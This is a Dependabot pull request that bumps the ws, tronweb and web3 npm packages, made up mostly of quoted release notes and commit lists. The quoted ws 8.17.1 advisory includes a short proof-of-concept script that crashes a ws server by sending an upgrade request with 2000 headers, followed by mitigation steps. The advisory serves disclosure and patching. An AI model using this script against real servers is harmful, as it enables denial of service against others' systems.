
Bump ws, tronweb and web3 #6

Open
dependabot[bot] wants to merge 1 commit into master from dependabot/npm_and_yarn/multi-dde0d02dbd

Conversation

dependabot[bot] commented on behalf of github on Aug 21, 2024

Bumps ws to 8.17.1 and updates ancestor dependencies ws, tronweb and web3. These dependencies need to be updated together.

Updates ws from 3.3.3 to 8.17.1

Release notes

Sourced from ws's releases.

8.17.1

Bug fixes

  • Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the `server.maxHeadersCount` threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```

The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

  1. Reduce the maximum allowed length of the request headers using the `--max-http-header-size=size` and/or the `maxHeaderSize` options so that no more headers than the `server.maxHeadersCount` limit can be sent.

... (truncated)

Commits
  • 3c56601 [dist] 8.17.1
  • e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
  • 6a00029 [test] Increase code coverage
  • ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
  • b73b118 [dist] 8.17.0
  • 29694a5 [test] Use the highWaterMark variable
  • 934c9d6 [ci] Test on node 22
  • 1817bac [ci] Do not test on node 21
  • 96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
  • e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
  • Additional commits viewable in compare view

Updates tronweb from 4.4.0 to 5.3.2

Release notes

Sourced from tronweb's releases.

v5.3.2

  • Add custom block header argument for building transactions locally in transactionBuilder lib
  • Support TIP586 by trx.getBandwidthPrices and trx.getEnergyPrices
  • Support recover transaction signer address by trx.ecRecover
  • Support multi-dimension address array such as address[][] for ABI params encoding in triggerSmartContract and createSmartContract #433
  • Fix error when triggerSmartContract with error address due to the undefined callback #429
  • Bump axios from 0.26.1 to 1.6.2 #445

v5.3.1

  • Fix getBlockRange() error for range of 1 (tronprotocol/tronweb#398).
  • Add support for estimateenergy in TransactionBuilder#deployConstantContract() API.

v5.3.0

  • Replace elliptic with ethereum-cryptography/secp256k1
  • Bump ethers to ^6.6.0
  • Optimize argument validation for createToken, updateToken and applyForSR
  • callValue can be 0 when the contract constructor is payable
  • Support shouldPollResponse to customize poll times (tronprotocol/tronweb#368)
  • Support TIP541 by transactionBuilder.cancelUnfreezeBalanceV2
  • Support TIP542 by adding a parameter in transactionBuilder.delegateResource
  • Support estimate the energy used in contract deployment by transactionBuilder.deployConstantContract

v5.2.0

  • Support build transactions locally with protobuf
  • Support multi-sign for setAccountId, updateBrokerage, clearABI, updateAccountPermissions function in transactionBuilder lib

v5.1.1

v5.1.0

  • Add freezeBalanceV2, unfreezeBalanceV2, delegateResource, undelegateResource and withdrawExpireUnfreeze function in transactionBuilder lib to support stakeV2
  • Support tronWeb.transactionBuilder.estimateEnergy to estimate energy for triggersmartcontract transaction
  • Add getDelegatedResourceV2, getDelegatedResourceAccountIndexV2, getCanDelegatedMaxSize, getAvailableUnfreezeCount and getCanWithdrawUnfreezeAmount function to query account resource info

v5.0.0

  • Add tronWeb.utils.transaction lib to serialize and deserialize transaction
  • Add tronWeb.utils.transaction.txJsonToPb function to convert transaction json to protobuf
  • Add tronWeb.utils.transaction.txPbToTxID function to get txID from transaction protobuf
  • Support new transaction builder createAccount

Commits
  • 3a81bf1 Merge pull request #480 from tronprotocol/release/v5.3.2
  • 9e59a03 feat: compat with ledger
  • 50e77f8 fix: change unit tests for getBandwidthPrices & getEnergyPrices
  • 14c3438 Merge branch 'release/v5.3.2' of github.com:tronprotocol/tronweb into release...
  • 0223b8e fix: replace named import with default export module
  • 5d5ba3b feat: using trongrid api parameter
  • 4eae496 feat: update readme
  • 43677b1 feat: ecRecover returns base58 format
  • 7ce7971 fix: npm audit fix
  • fb263c3 docs: add recent history
  • Additional commits viewable in compare view

Maintainer changes

This version was pushed to npm by troncore, a new releaser for tronweb since your current version.


Updates web3 from 1.10.4 to 4.11.1

Release notes

Sourced from web3's releases.

web3-eth@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-eth@4.0.0-alpha.0

web3-core-requestmanager@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-core-requestmanager@4.0.0-alpha.0

web3-providers-http@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-providers-http@4.0.0-alpha.0

web3-providers-base@1.0.0-alpha.1

Changed

  • Update version to 1.0.0-alpha.1 for web3-providers-base
  • Update version to 4.0.0-alpha.0 for web3-utils in web3-providers-base

web3-utils@4.0.0-alpha.0

Initial alpha release

Install with yarn add web3-utils@4.0.0-alpha.0

web3-packagetemplate@1.0.0-alpha.0

Initial alpha release

Install with yarn add web3-packagetemplate@1.0.0-alpha.0

Changelog

Sourced from web3's changelog.

[4.11.1]

Fixed

web3-errors

  • Fixed the undefined data in Eip838ExecutionError constructor (#6905)

web3-eth

  • Adds transaction property to be an empty list rather than undefined when no transactions are included in the block (#7151)
  • Change method getTransactionReceipt to not be casted as TransactionReceipt to give proper return type (#7159)

web3

  • Remove redundant constructor of contractBuilder (#7150)

[Unreleased]

Fixed

web3-utils

  • Fixed format schema with oneOf doesn't work correctly (#7055)

Added

web3-eth-accounts

  • Added public function signMessageWithPrivateKey (#7174)

Commits

You can trigger a rebase of this PR by commenting @dependabot rebase.


Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)

You can disable automated security fix PRs for this repo from the Security Alerts page.

Note: Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

Bumps [ws](https://github.com/websockets/ws) to 8.17.1 and updates ancestor dependencies [ws](https://github.com/websockets/ws), [tronweb](https://github.com/tronprotocol/tronweb) and [web3](https://github.com/ChainSafe/web3.js). These dependencies need to be updated together.


Updates `ws` from 3.3.3 to 8.17.1
- [Release notes](https://github.com/websockets/ws/releases)
- [Commits](websockets/ws@3.3.3...8.17.1)

Updates `tronweb` from 4.4.0 to 5.3.2
- [Release notes](https://github.com/tronprotocol/tronweb/releases)
- [Commits](tronprotocol/tronweb@v4.4.0...v5.3.2)

Updates `web3` from 1.10.4 to 4.11.1
- [Release notes](https://github.com/ChainSafe/web3.js/releases)
- [Changelog](https://github.com/web3/web3.js/blob/4.x/CHANGELOG.md)
- [Commits](web3/web3.js@v1.10.4...v4.11.1)

---
updated-dependencies:
- dependency-name: ws
  dependency-type: indirect
- dependency-name: tronweb
  dependency-type: direct:production
- dependency-name: web3
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>
@dependabot dependabot bot added the dependencies Pull requests that update a dependency file label Aug 21, 2024